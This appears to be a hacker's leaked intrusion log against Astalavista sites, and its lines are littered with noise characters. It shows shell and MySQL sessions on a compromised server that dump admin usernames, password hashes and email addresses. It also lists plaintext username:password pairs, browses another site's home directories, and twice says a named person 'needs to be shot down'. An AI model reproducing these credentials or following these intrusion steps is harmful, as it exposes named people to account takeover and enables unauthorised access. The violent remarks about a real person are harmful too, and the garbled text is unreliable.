<description>All availably Exploits.</description>' F: n! x" Y, P7 i
<language>en-us</language>
0 O8 @5 |7 a, ^1 u5 m5 [5 w: W; ` <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
- w: _9 x0 {' h$ a2 ?4 S% R <docs>http://blogs.law.harvard.edu/tech/rss</docs>
& s- [: T c# q3 x, S* M: K5 k# C5 L <generator>Astalavista.com</generator>' ^' n5 a) {- A5 m N% x
<webMaster>info@astalavista.com</webMaster>’ . $items . ‘
" T3 H- y R& a </channel>3 w" ?, j$ u$ |) _+ ~
</rss>’;
( n# W! g5 r5 q& j* n% v+ ]/ f) R5 l' V+ G; w
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {4 M# w; J' r0 w9 c; }( A3 h! c
unlink (FULLPATH . ‘/feed/exploits.xml’);
J" }! E5 j" L6 @$ k* P" ]' p& O }- c. `0 |4 V; U* B! O# o
( z$ o/ w' C3 L2 |# u# n
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
- N: q) E g6 M' z/ ^& N: G[snip]5 T7 B% X t6 Y6 U
+ m* J. |% q+ v8 H1 G: R8 R5 ~6 H' Ash-3.2$ cat exploits.sh
, [: j! J+ g! z( o6 J, ^#!/bin/sh
1 Y$ [0 {/ W; a6 R
# L' \# k; s/ k$ m5 J! c, _& {###########################################################8 x$ k3 W6 u) } M; ?# [3 ~
# #
) k3 j ]' j5 u! f# Title: milw0rm exploits adder #
$ l4 |* M) a6 A; C8 Q. c# Description: Add all milw0rm exploits to the #; c8 L: H2 V: F, `% ^; p
# Astalavista.com database #
) A3 y8 A0 M( p* w# #( ?+ P# c1 E; |5 i8 z1 T* _ M) ~: Q
# Company: Astalavista Group #5 U# t1 J: L* f L. x* V% ~+ d. C
# Author: Paulo M. Santos #) g4 M+ Z+ u- F2 i! n5 C( V
# E-Mail: 链接标记paulo.santos@astalavista.ch #
* I8 n5 N9 l2 X! q! z# #% V- q8 Q+ S9 Q. ]' p/ H$ ^
###########################################################
|8 P/ d1 V: `8 n0 v: e; N
* q2 y5 x1 B6 \# path1 p3 E7 S5 N) K* c
this_path=/home/com/public_html/modifications/cronjobs+ e% q* d7 L0 W" m W4 ?
: k2 O$ V# I7 N- {- X# w1 i# change directory2 a9 o; h6 D* J. R) ]. c9 b+ y1 D
cd $this_path
[! x; P0 c& X) J+ J- \0 dcd tmp/. v; i9 p! \4 N' y
% R# d0 k( Y: e8 h" Z6 g% ]9 x
# delete files- V3 h2 P( H& v+ }7 O) a/ Y
rm -rf milw0rm.tar.* &0 \3 Y9 b6 M m0 Q7 V f8 c! C% ]9 V
rm -rf milw0rm/ &0 P# Z: ^- i; z# V2 n8 z9 e% B
5 f6 \/ l% M! l& A' c
# wget milw0rm paket# `: Z; e4 S/ W/ T
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]: @& D: ^1 ^! L
% v3 |9 `* S! \+ Y& a# extract milw0rm paket6 D6 C- c8 [0 ~( H# T! @ H, Q
tar -xvf milw0rm.tar.bz2+ Q6 c/ P0 H. E% w# B, Q$ F
" m7 s9 m4 Z* \; h+ k* @" P# change owner
& j+ m! Q ?2 B# G, R$ d9 a7 M$ tchown -R com .5 B3 i7 e2 h1 x8 | s. ~ o
chgrp -R com .
1 {" }. U8 n4 E6 }$ g* b/ N9 c4 a$ D
+ K0 U8 b' v6 e o! _' z# execute php script
( }. F2 b6 M# C* Z G4 i; c$ K) Scd $this_path" x9 t. Q6 {- `' Y+ X
php -q exploits.php
/ ^5 h1 {8 c9 E. Q* P/ e2 ?% J! ^
/ B1 w9 o B( m# w( @# delete files" u7 h0 f, o! D: {- J$ J+ j9 W
rm -rf tmp/milw0rm.tar.*
, T6 ~+ c+ S* ?2 l2 P) J) Krm -rf tmp/milw0rm/
9 y: P9 F$ _4 v8 h* @) ^5 m: a+ b/ N* s' Q
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”: Q' X/ p# ?2 Q" M( G* l. ^' o
Paulo M. Santos needs to be shot down.
" N" E2 r+ L# K, H$ S0 {2 F
- [5 }. i& A( ^" R" }mysql -u contrexxuser2 -p: o' B) }9 e) j& T9 W0 x+ Z- r: a
Enter password:1 L. V9 v/ p$ P9 x
Welcome to the MySQL monitor. Commands end with ; or \g.
; L0 s& k- V: PYour MySQL connection id is 2616945 ^3 x( {( z) @2 [- m
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
# ^# A) Q& [7 K$ ]9 v3 L2 w! \# O% [
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.( k5 d: J% e3 ~
, S* f8 A/ V4 v% ]; T. mmysql> show databases;
: ~- k# c3 E( X4 k+ |& B+——————–+& g) N1 V2 e8 H' Q$ X- o, g3 v
| Database |
2 S3 u% L& s9 G) M+——————–+
& C9 L6 T1 O% R$ P' K- n) `& a| information_schema |3 P# Y+ Z/ O: n! G: }- x8 c
| com_contrexx2 |
% ^3 H# Y2 @( k6 @3 H/ A6 y| com_contrexx2_live |" l- V% C6 Z! X' e
| test |& Z- M! O3 z! ?( `
+——————–+( q& X! ?3 r# [8 i% ^: E! o
4 rows in set (0.00 sec)7 p/ ^$ y, ]( `8 V: v% w( E) [+ l
; X$ e) y8 ?8 r4 X; i' Z& ?" gmysql> use com_contrexx2_live6 m* J- k5 M0 k4 L) J# J
Database changed
( ~4 }* B/ S* n& Y Wmysql> show tables;3 r- k! U( ]4 E$ v; ~" M
+————————————————–+5 y9 I7 _" F: |! ?
| Tables_in_com_contrexx2_live |
" `, j! w. q/ |4 |+————————————————–+) P# ]% s; G' f5 L
| cc_banner_counter |* b0 }" k3 u# C
| cc_search_counter |% e' j9 n `% Z* J5 Q% I4 H
| contrexx_access_group_dynamic_ids |, b" ^6 M1 a3 B, N" t! x2 ^4 x
| contrexx_access_group_static_ids |
( @* Y/ {* v+ I( i0 U| contrexx_access_rel_user_group |; o4 C! U- y" u* C
| contrexx_access_settings |
5 ?2 r: c- P3 u+ I, r( r" F* || contrexx_access_user_attribute |
$ m4 @2 D+ Z: l6 K- S& q7 f| contrexx_access_user_attribute_name |: o ^! ~+ c5 }- [
| contrexx_access_user_attribute_value |" U! U- q, e) M4 f9 O3 j0 o5 D' o8 V
| contrexx_access_user_core_attribute |
3 @; x: b' t u$ S1 u& H' _7 [# u1 T5 N| contrexx_access_user_groups |
9 M( c9 ]; ^% n9 x8 q7 k| contrexx_access_user_mail |
7 A C6 K1 a R" R) e& ?2 r/ G| contrexx_access_user_profile |9 a( O: V! |& d( @
| contrexx_access_user_title |/ D; H9 t- D. w* A% r
| contrexx_access_user_validity |
% n7 @) i) L- f' M. R| contrexx_access_users |+ a4 ^7 C. u( \) ?) D% E7 B
| contrexx_backend_areas |
4 u' C1 ?) b2 E( R| contrexx_backups |4 B% V2 ~& |( n* V( {7 i( t% O
| contrexx_content |/ d! f$ E" ^# B
| contrexx_content_history |* V# T7 J' i1 y/ F8 S
| contrexx_content_logfile |
& @+ t: O+ t5 e| contrexx_content_navigation |7 p$ K! g7 w! g% D
| contrexx_content_navigation_history |
* I4 K: K% f% R! B4 k| contrexx_ids |. u9 c" |. {4 | D' G# C
| contrexx_languages |6 U1 I% g4 ?: Q% o p- E0 B6 ~
| contrexx_lib_country |
+ F$ \( t& g' B: ]# D2 x' v1 V| contrexx_log |
4 y! y4 o k5 P2 q" D7 J| contrexx_module_alias_source |* d! w- X4 W9 @0 `
| contrexx_module_alias_target |3 ~6 Z- B3 M' \# ?
| contrexx_module_block_blocks |; D& ^' v( j- n& r7 s
| contrexx_module_block_rel_lang |
7 z7 H0 h5 X; m4 O0 s8 A$ A| contrexx_module_block_rel_pages |' B! s- E7 }5 M ]5 o) j
| contrexx_module_block_settings |! H1 T( Z7 P8 a& I1 N: s. W" S
| contrexx_module_blog_categories |
1 v0 Y; W! L) i| contrexx_module_blog_comments |$ s3 o! w* I9 O2 r- g
| contrexx_module_blog_message_to_category |
3 d4 F z+ }5 S0 [% K+ W| contrexx_module_blog_messages |
$ Z0 P: B* S1 @) D( Q& ^| contrexx_module_blog_messages_lang |! d/ c5 Z; E" e+ s
| contrexx_module_blog_networks |$ Z8 n! t9 L+ Z' f
| contrexx_module_blog_networks_lang |
: f0 v% d' l$ ?: a3 A; C| contrexx_module_blog_settings |
7 J* \% ]/ `: R; R- f! K9 ^| contrexx_module_blog_votes |3 K! ~' l& X, W w0 z" U( s
| contrexx_module_calendar |! C# T" A2 ?7 d6 L5 N; N7 E9 ?
| contrexx_module_calendar_access |
3 W2 _# o) P ?7 v# _| contrexx_module_calendar_categories |/ ]/ U6 A" ~# d, T/ e6 L$ h
| contrexx_module_calendar_form_data |
2 D7 D1 D Y4 b- B/ Q1 N( g7 i& q# P| contrexx_module_calendar_form_fields |
( R! y( t; Y$ o9 |7 |% d7 }3 ]6 Z& p| contrexx_module_calendar_registrations |3 T. b# \, M/ A$ `# X
| contrexx_module_calendar_settings |
7 m; `, `- I6 ^| contrexx_module_calendar_style |
' I0 O; [! G; z P/ \| contrexx_module_contact_form |
, ]/ J, f+ t$ t7 u| contrexx_module_contact_form_data |
! s* l1 J8 B' b6 q| contrexx_module_contact_form_field |0 w$ d) I* Z0 O9 Z9 b
| contrexx_module_contact_settings |
( ]/ g# q" b4 Z# ?5 x9 m1 B# Q$ f| contrexx_module_data_categories |( m( ?! [7 L) ~5 [- I8 g
| contrexx_module_data_message_to_category |% G4 u5 U* b! _
| contrexx_module_data_messages |
8 X1 }; `0 W" A" T* ?| contrexx_module_data_messages_lang |
* W! m( y' x$ T) r) x- _6 a| contrexx_module_data_placeholders |
2 L. I: |/ y& Q, h L' w; A/ K# {| contrexx_module_data_settings |3 g* d, q6 `) M5 H
| contrexx_module_directory_access |
- ^6 U( \/ W* Z; k, O5 n| contrexx_module_directory_categories |
g. M2 C) Z1 z" _% u| contrexx_module_directory_dir |
( X) m4 E; F2 V# Y: H/ g( u| contrexx_module_directory_inputfields |
/ e: ^: I c1 T' ?& p1 L| contrexx_module_directory_levels |8 T$ T5 x4 I' ^- H/ G* a$ [
| contrexx_module_directory_mail |3 ` K( m+ x* W6 t
| contrexx_module_directory_rel_dir_cat |
0 Z* k% D5 @$ r& n1 f| contrexx_module_directory_rel_dir_level |
: l' }) i+ |( X0 l1 c| contrexx_module_directory_settings |/ m9 p7 G( ?1 Y8 N; x
| contrexx_module_directory_settings_google |
7 G2 k3 F) L5 U3 ^" z- G| contrexx_module_directory_vote |' H0 }: e1 h& Q( n- a
| contrexx_module_docsys |& [0 I+ I* ^- k! q
| contrexx_module_docsys_categories |6 y2 k; ?* i8 a: ^
| contrexx_module_egov_configuration |
" u$ i+ O- A J7 L+ N+ y6 ]. S| contrexx_module_egov_orders |
8 V) D- @, i7 a2 ]4 z/ q* d% r) {, f| contrexx_module_egov_product_calendar |" i6 }6 |% W# y. c' K; W" X
| contrexx_module_egov_product_fields |
1 e+ T8 w5 O: g8 k% P& e| contrexx_module_egov_products |2 P- g& f/ X8 v! g- K
| contrexx_module_egov_settings |
1 P* k1 ?0 F) X/ |* f| contrexx_module_exploits |( F+ _; a( p5 B/ R) ?9 T
| contrexx_module_exploits_categories |6 _& Y1 @7 z* k
| contrexx_module_feed_category |
% A" R5 s3 Q1 h| contrexx_module_feed_news |' n% X0 e) p5 W/ l3 C% `
| contrexx_module_feed_newsml_association |; h/ h( v }8 ]
| contrexx_module_feed_newsml_categories |
* F% A! t- o# e D' T" M! _| contrexx_module_feed_newsml_documents |
+ O& S r- F( Z/ v' |! j& h| contrexx_module_feed_newsml_providers |
8 N; i$ ]% i! d4 ?- p( a& A; Y| contrexx_module_forum_access |
6 w/ j. P$ m; x, H' b7 O| contrexx_module_forum_categories |
) q$ w) c' j2 m7 E+ b3 || contrexx_module_forum_categories_lang |. L5 U; q! u% B) T5 H$ E( t$ ]5 P5 c
| contrexx_module_forum_notification |
7 ?+ ]( u( ?3 i# n1 o| contrexx_module_forum_postings |7 i7 L J3 f+ A2 H
| contrexx_module_forum_rating |( ^- J0 k7 W4 \0 S1 b( ~
| contrexx_module_forum_settings |( d2 V. x# Q2 d; c9 A) ~9 N
| contrexx_module_forum_statistics |* C. I7 v/ T1 q# H
| contrexx_module_gallery_categories |* u3 u1 [/ W1 y1 S
| contrexx_module_gallery_comments |: @. W( e L2 v. `! j7 \2 b# Y
| contrexx_module_gallery_language |- J/ M! k" J# D! j
| contrexx_module_gallery_language_pics |
& a1 ^" A4 R( ]* r. T+ ~| contrexx_module_gallery_pictures |/ C$ ?* ^- W1 B9 J
| contrexx_module_gallery_settings |; I1 ]1 O& \/ [6 F/ P( k" I
| contrexx_module_gallery_votes | p% v, e' O, b" w- o% F) V9 p4 u
| contrexx_module_guestbook |
2 L& L3 ?9 M! m( j4 N| contrexx_module_guestbook_settings |$ X( M$ R" F' z1 M) [- C( n
| contrexx_module_livecam |
& ]0 Q z" V3 _4 w) c3 G| contrexx_module_livecam_settings |
3 C. }3 M" b4 T1 a2 j+ L| contrexx_module_market |
% X5 B( s, @- K0 T a6 v| contrexx_module_market_access |
, u% n# v2 S z! m| contrexx_module_market_categories |9 a0 X4 L" t: O" j) `, |% {3 m
| contrexx_module_market_mail |
: f- ]0 o2 p, e5 f( V| contrexx_module_market_paypal |
$ x& @) V2 e$ x, m8 z| contrexx_module_market_settings |5 t/ k4 Z7 U& Y# }" h
| contrexx_module_market_spez_fields |
" Y& m: F: W9 Z: A6 F2 M| contrexx_module_mediadir_access |
( X0 @2 i6 z: }7 f- c| contrexx_module_mediadir_categories |
) A/ p8 S/ r$ h e| contrexx_module_mediadir_comments |- `; j8 n0 P6 L; [! Y
| contrexx_module_mediadir_dir |8 o" V4 }; w6 z; ^+ s4 H5 z
| contrexx_module_mediadir_inputfields |2 S* s" X1 h( y/ T* c$ ?
| contrexx_module_mediadir_levels |7 v5 A* C3 ^5 m5 u, S
| contrexx_module_mediadir_mail |! E8 G v& B- c7 S" g7 d$ \4 g- s* I
| contrexx_module_mediadir_rel_dir_cat |0 u( c$ i5 `) P/ \1 ~" v( {
| contrexx_module_mediadir_rel_dir_level |' m3 p- i/ o4 w2 ^" x q3 P
| contrexx_module_mediadir_reports |3 N. p$ a# b% ~, s |% m' I
| contrexx_module_mediadir_settings |1 l. c6 i, ~5 O5 N* w7 C' I
| contrexx_module_mediadir_settings_google |
3 v6 q7 c, q% R+ p| contrexx_module_mediadir_vote |" B" [# l* P; m) p Z5 x( U- i4 `
| contrexx_module_memberdir_directories |
9 a, q3 o' z/ z5 _' K| contrexx_module_memberdir_name |
/ k# ?- S0 U2 F" F* || contrexx_module_memberdir_settings |! t- X* w1 o& o8 o
| contrexx_module_memberdir_values |6 O" b5 W' I( [' w
| contrexx_module_nettools_allowed_groups |' Z4 e! |; P9 d' r. \
| contrexx_module_nettools_settings |
/ [; g; U' I& i: P* J# j| contrexx_module_news |
; }1 q2 ~8 f$ }2 L2 r| contrexx_module_news_access |7 K! f# l" t2 Q$ ^; F
| contrexx_module_news_categories |
+ l% k( b$ g( [& _| contrexx_module_news_settings |
! H- H, z9 d1 u' @, F4 A. || contrexx_module_news_teaser_frame |
3 |5 c$ J- F! d, p| contrexx_module_news_teaser_frame_templates |
# H3 l7 ^5 G* U( d5 U& ^| contrexx_module_news_ticker |4 k" O% J6 }, E' m5 ?8 ?, b2 e: e a
| contrexx_module_newsletter |. i6 K' U; b, J
| contrexx_module_newsletter_attachment |% b, }! r3 @+ [( m H: D
| contrexx_module_newsletter_category |; |9 F9 s+ u$ P$ M! ^! ] ?) u R! w
| contrexx_module_newsletter_confirm_mail |) V9 y+ p( o0 c/ d: ]3 J3 E+ h
| contrexx_module_newsletter_rel_cat_news |' l( C0 J* }) Z7 N$ A; o$ r0 S* F
| contrexx_module_newsletter_rel_user_cat |
j9 [0 A7 o ]" {) {| contrexx_module_newsletter_settings |
$ z( M9 d; U* G, p5 ^| contrexx_module_newsletter_template |' P1 H9 m# m o
| contrexx_module_newsletter_tmp_sending |( u, b% Y5 X+ [9 o0 P. k2 b& G
| contrexx_module_newsletter_user |$ W$ i, p7 U) |! f w. H5 E+ _) w
| contrexx_module_newsletter_user_title |
" b0 [9 [: u1 T* h" L' j7 N- A| contrexx_module_onlinetools_defaultports |
8 m0 F. {) o( u6 e: E7 X' t+ z0 W3 y| contrexx_module_onlinetools_defaultports_back |' `9 v" v# n7 f- V' \
| contrexx_module_onlinetools_geolitecity_blocks |7 j% ?) E# f3 A% t. K( T3 P/ [
| contrexx_module_onlinetools_geolitecity_country |, A7 {( `8 ~; L' x4 Z7 |# F: }
| contrexx_module_onlinetools_geolitecity_location |+ X2 F/ U; A" V4 }, ^9 ]( L1 d
| contrexx_module_podcast_category |
) I! }6 T2 M K5 ~. y6 a| contrexx_module_podcast_medium |
1 e# _2 e1 _( Z% Q/ `& y+ O: ?| contrexx_module_podcast_rel_category_lang |: j7 p/ K# G( _4 \/ f& E
| contrexx_module_podcast_rel_medium_category |
) o9 I* O' \, n' {2 f| contrexx_module_podcast_settings |
' @5 a+ u3 R9 o3 x| contrexx_module_podcast_template |* o3 q. a7 U, ]+ z& _
| contrexx_module_proxydb |
% w N! c, J! D. D' x' b5 S, Z| contrexx_module_recommend |
0 [, x J! K3 m" Q- E! }& ? W| contrexx_module_repository |
$ X5 r# G6 l R5 |! N, C$ x. j| contrexx_module_securitynews_cats |7 a0 ^( d/ |8 m' g
| contrexx_module_securitynews_feeds |+ k4 k% x1 M7 C& S M, R
| contrexx_module_securitynews_news |* p/ a4 ~- W6 l0 N% ^9 }/ x# }+ s
| contrexx_module_shop_categories |
; C' f- h/ f+ x- F; O| contrexx_module_shop_config |
, n$ |7 L/ r0 |9 I0 a| contrexx_module_shop_countries |4 S- o# h- n! b- U
| contrexx_module_shop_currencies |
; B3 g" c; k) K- [' ^ _2 S| contrexx_module_shop_customers |; v0 }5 w* v0 N5 m! C2 v
| contrexx_module_shop_importimg |
/ p8 Y% G m- O$ F6 i+ h| contrexx_module_shop_lsv |" H0 m6 s' |9 p$ r# r: o3 r
| contrexx_module_shop_mail |# X, c6 {, E% d6 V9 |0 ?
| contrexx_module_shop_mail_content |
# _( n% o& |* l0 r; g6 G& C| contrexx_module_shop_manufacturer |
, \0 C+ C0 t/ b' m| contrexx_module_shop_order_items |- H: l* R) m) R& q
| contrexx_module_shop_order_items_attributes |" [& u( U& a8 X3 n3 c% W9 a
| contrexx_module_shop_orders |& z7 ^4 l+ p! k( w2 J$ s) ]
| contrexx_module_shop_payment |
0 e0 m/ ?0 ?/ E" N, \| contrexx_module_shop_payment_processors |
9 A# \. A) b* `' w+ P: || contrexx_module_shop_pricelists |
1 S" O8 x# r! m' C| contrexx_module_shop_products |3 o4 R- Q$ A: U2 z+ k/ U
| contrexx_module_shop_products_attributes |
7 D* ?4 a: P! d g| contrexx_module_shop_products_attributes_name |9 b% c" g% n9 ^6 _* w
| contrexx_module_shop_products_attributes_value |/ D4 p" l- X4 p# j4 L9 Z! {
| contrexx_module_shop_products_downloads |
$ p. ?- G- S6 O: A; D| contrexx_module_shop_rel_countries |
1 c# I# i$ f8 q% [( B" E| contrexx_module_shop_rel_payment |4 e' f. B2 s" Q+ Y$ M8 ?0 S
| contrexx_module_shop_rel_shipment |
3 G+ ~& l2 |( h. Q# m7 d4 u: ~| contrexx_module_shop_shipment_cost |; _1 E! l: |" h, H3 V. x
| contrexx_module_shop_shipper |
4 l5 I6 D- p9 Z* Q$ D| contrexx_module_shop_vat |
8 y* ?3 |2 \, @. ^. Z7 y& L| contrexx_module_shop_zones |- q. I; {" Z2 N4 C/ [ @' {, L4 z
| contrexx_module_u2u_address_list |
0 v. C5 u2 y" L# E. ?| contrexx_module_u2u_message_log |6 [- b; k: L' X% s/ a
| contrexx_module_u2u_sent_messages |
& F: L# P; e/ K. M5 Y1 Q8 F/ B| contrexx_module_u2u_settings |
1 n+ T; F2 T3 T. Y| contrexx_module_u2u_user_log |
' s; g0 {& H% [: p1 P| contrexx_modules |
$ R$ m5 J) T' o| contrexx_sessions |" a! p; `( z5 _# h- u4 o; K
| contrexx_settings |
& W0 T. y/ |6 \- \3 O| contrexx_settings_smtp |7 Y$ w0 k; Q4 j+ T7 x. L
| contrexx_skins |; t1 \0 V# f, e
| contrexx_stats_browser |
1 g' }$ T5 o6 ]4 Z& i| contrexx_stats_colourdepth |
2 I5 h' {/ w. I| contrexx_stats_config |* a# r: M B; y. {/ J% J
| contrexx_stats_country |
: K% \, R6 W( w3 ]| contrexx_stats_hostname |
7 Q2 \+ |1 q4 S( ^- d+ m0 g| contrexx_stats_javascript |
L4 Q* y* g8 C( p! w2 ^3 h| contrexx_stats_operatingsystem |
4 a7 W3 R8 y# Z* r1 @ L6 p2 l| contrexx_stats_referer |) t: y. p l4 B" G/ Z; g: |) u
| contrexx_stats_requests |
, \3 p1 `( g# ~8 ?. u$ q4 t0 n- ]# q) Y+ S| contrexx_stats_requests_summary |$ X) V9 t" P5 \9 q7 _5 |
| contrexx_stats_screenresolution |# @7 T- x2 i6 a9 H: s
| contrexx_stats_search |
N! ^7 \2 }( w9 O8 G4 Z| contrexx_stats_spiders |
) y% m5 n- A& H1 V| contrexx_stats_spiders_summary |7 X z& O8 f6 ?. g6 S+ J
| contrexx_stats_visitors |
- t- h* @4 [7 V4 o| contrexx_stats_visitors_summary |- I6 i9 \5 ^: N3 }% `
| contrexx_voting_additionaldata |. | Y5 U4 V+ b6 b+ i
| contrexx_voting_email |
+ V4 r/ Y3 ]. m! A4 }# P| contrexx_voting_rel_email_system |
& |; a+ h0 \1 b4 t6 D& J| contrexx_voting_results |
+ C. h2 y8 B5 C. T- `| contrexx_voting_system |$ w, s* _6 p( S, W9 P" e" i) U
| foo |9 @/ A2 }& H1 V! K1 n; m/ v% ^. y
+————————————————–+
X, q J4 Y3 B! }/ O227 rows in set (0.01 sec)
7 P- L+ A) Y5 f6 T9 Y- X: L$ q+ {
$ r! g1 @. F2 ]' h6 w: ?4 Xmysql> select count(*) as skids from contrexx_access_users;
& Z( _3 Y6 |: B3 n+——-+5 [6 e, s) B3 ~, P7 X
| skids |
' s, E5 t0 D7 j G) T! @+——-+. s$ T5 W4 w0 S8 h1 n
| 53699 |
7 F8 M" {$ w6 ~# @3 a4 y+——-+- d: [" T; S/ @
1 row in set (0.00 sec)* C/ |4 E4 S% Y* T! ^
g9 |! @8 x( C: |6 T
mysql> describe contrexx_access_users;' g; \- f3 U6 c9 e3 {
+——————+——————————————+——+—–+————–+—————-+
9 [4 l2 V; g1 z6 k; f3 H# ~1 M* a$ m| Field | Type | Null | Key | Default | Extra |5 g; ?) \1 V3 G5 `. t4 `
+——————+——————————————+——+—–+————–+—————-+) _2 n& H, g# x& \
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |. I+ V( G! s2 o& r" X
| is_admin | tinyint(1) unsigned | NO | | 0 | |
( y0 M& N/ F( t0 {| username | varchar(40) | YES | MUL | NULL | |' u9 G1 ]! P5 d7 b
| password | varchar(32) | YES | | NULL | |
; J3 E, I$ W* ~# o" q ~+ x' P| regdate | int(14) unsigned | NO | | 0 | |
. q% x" n2 o, @) i, F6 b| expiration | int(14) unsigned | NO | | 0 | |- @7 h/ q8 @& \5 y% ~* L
| validity | int(10) unsigned | NO | | 0 | |
& S9 p! G) e( B6 u; _1 D9 s| last_auth | int(14) unsigned | NO | | 0 | |
8 |+ A! C; ^9 P2 J- f- I| last_activity | int(14) unsigned | NO | | 0 | |
0 Q: u8 S3 ]; z. P {( `| email | varchar(255) | YES | | NULL | |
6 O! y* v V) m6 c7 {$ ?| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |7 C$ W$ k8 Z& v4 W& q7 A) `" _& n7 r
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
5 t% h1 e0 y& W! B: N+ K1 t| backend_lang_id | int(2) unsigned | NO | | 0 | |6 ^$ O4 D/ ^% n
| active | tinyint(1) | NO | | 0 | |
) t: ] ^7 F* ?% {| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |: f |0 w/ `: O6 x; N7 v
| restore_key | varchar(32) | NO | | | |
5 n+ E% E- F1 A7 F ?8 I; X| restore_key_time | int(14) unsigned | NO | | 0 | |
; e# `3 M0 w& a1 S| u2u_active | enum(’0′,’1′) | NO | | 1 | |! {6 e; r# R# N
+——————+——————————————+——+—–+————–+—————-+
5 o- U* Z! D& S8 O$ F18 rows in set (0.00 sec)
# v0 P$ [4 | V$ X, l8 _- P& b- [& t0 ]7 b( `6 p i- c% ^9 B0 Q9 l! E4 \
mysql> select username,password,email from contrexx_access_users where is_admin = 1;
2 H; t& W0 `# s* v5 N) b2 ]+————+———————————-+—————————–+3 u0 t) _# B/ v% Q
| username | password | email |
) W% y& u8 U( h9 D! R+————+———————————-+—————————–+0 ?6 N- ^! ^; I6 k
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
0 a" m$ G. i3 S8 F/ \ q& ^9 C1 Y| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |+ U2 g# @" H) F2 `2 z* ~) }
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |9 a2 T0 S! R$ q. o: F
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
( z3 U2 N; R3 ^1 d+————+———————————-+—————————–+
) Y; c# E2 G; k8 o4 rows in set (0.04 sec)' V% k A1 ]9 D, J( R5 l+ U
- Y/ Q' K8 ?. k6 c* e2 h3 E* g
mysql> exit;
/ O2 m1 w* n& \Bye! v: e2 o: P$ N
$ i+ ~$ ~# Q( F7 n8 L- T7 Y) F G
[~] There you go, your “team of security and IT professionals” is a joke.# F, F* ]/ g0 _% S+ h. ?) T: Z
5 Y' ~# V3 D; D
+——————————+
& D$ N+ k. b6 m7 @. Psystem:f82BN3+_*9 \4 D# k! _; d+ N
Be1er0ph0r:belerophor4astacom/ T* ~+ k7 K9 u
prozac:asta4cms!0 m- t. L; ~: p; G7 u1 H
commander:mpbdaagf6m' M" A4 @# H! s
sykadul:ak29eral
# ~7 E3 w1 S# m a+——————————+& D) X! ?; X9 I! S. `
& f2 M. H- l" x6 J5 t5 u( o[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)
( ^8 |5 l$ u7 R3 D…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
/ h2 U$ L/ t5 V7 D( a
; A) q" a& E! A: T! p7 O) F% D[~] Lets move to astalavista.net now,
. f% ]" |' g" ?$ ]5 E5 }. p0 Z$ {
$ N3 g3 @ P# S# @3 nFrom <链接标记[url]https://www.astalavista.net/[/url]>:
$ ^( p; k9 r7 O' O$ v! ]% y8 p8 H>> Everyone knows that the best defense is a good offense.8 @7 x% G0 L% |% k1 O
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
/ j! X- u* q9 h k; U$ f>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
% Q4 {4 b& v: ]! h7 [: i>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”- c" [& w5 s$ z! T
; X1 d" q; d* I! b
>> Go ahead, try and hack our server . in a completely legal way!% e7 Z& U. o$ [) ~' F& z
>> Learn by doing: We offer our members tricky tasks and challenges on an
6 [ X4 h; X" w* }) V% O3 w6 l>> ongoing basis so you can test your knowledge and abilities. You can also0 ~8 n$ K/ m8 g2 n& s
>> demonstrate what you.ve mastered by taking part in regular hacker contests9 S& `5 J) g. m/ x2 L" v0 c
>> and war games
- H3 c( A9 P7 E* H4 [, ]' G6 y- h3 H" c( b: x0 _2 e5 o5 \4 e# a$ Q
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
/ {: g0 W: j4 q7 e o
9 }' e6 f/ `+ f& n3 {, j# N" f( p[-] Tricky task: Find home dir of astalavista.net) l0 \( b, x& W4 P& O
! P5 F9 y8 d" e1 |3 Z% ]% ush-3.2$ ls -la ~astanet
* c+ b6 [% Y% o# Gtotal 48
3 C. |, p4 z) Idrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
6 I3 h& l0 D4 O. R! d/ |: \drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..4 Z; ]' `! Y$ A! W$ E
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth( X) \5 E4 k/ b
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history7 @: X- S2 B2 }1 m4 C: M
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout6 v+ e a' ~! y& B& B% ~
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile4 y" F& g7 l/ U8 g3 N s- ?
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc) x5 f. P2 H2 X# L V
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
, g* O9 h1 [2 J6 S4 e4 udrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap4 z2 k) z% P: X
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail0 l' z) J; [5 y
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
6 g6 J7 @ Y; s" ]! x-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow& d* [& u7 @+ k; y
# x7 M$ l! w9 q7 U% @! Dsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/ H- S7 M+ q$ y8 g5 T0 U; d
sh-3.2$ ls -la
; m* X; c5 b% L& }' P2 \total 200
8 `- C- G% S3 i) D9 h& g ?7 r* Edrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
